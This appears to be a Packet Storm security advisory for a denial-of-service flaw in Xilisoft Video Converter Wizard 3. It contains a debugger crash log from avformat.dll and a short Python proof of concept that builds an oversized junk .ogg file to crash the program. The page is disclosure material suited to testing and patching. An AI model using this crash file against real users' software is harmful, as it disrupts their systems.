Xilisoft Video Converter Wizard version 3 suffers from a denial of service vulnerability when processing .ogg files.
cc27b8eddb7241321d48f7915f53fc8911e9cd44b92b50c60adf686f281b0300ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> g
(26c8.1818): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06
00000000 00000000 00000000 00000000 00000000 avformat!nut_init+0x42a
0:000> d eip
0036a9ba 8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9ca 8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036a9da 90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00 .......D$.3.3...
0036a9ea 8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9fa 8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036aa0a 90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57 ......V.t$...tTW
0036aa1a b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00 .Z...3.....h.@..
0036aa2a c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00 .F..@.......h...
################PoC Start##############################################
print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"
#Download from
# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1
#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
buff = "D" * 8400
try:
oggfile = open("XilVC_ogg_crash.ogg","w")
oggfile.write(buff)
oggfile.close()
print "[+]Successfully created ogg file\n"
print "[+]Coded by Praveen Darshanam\n"
except:
print "[+]Cannot create File\n"
################PoC End################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed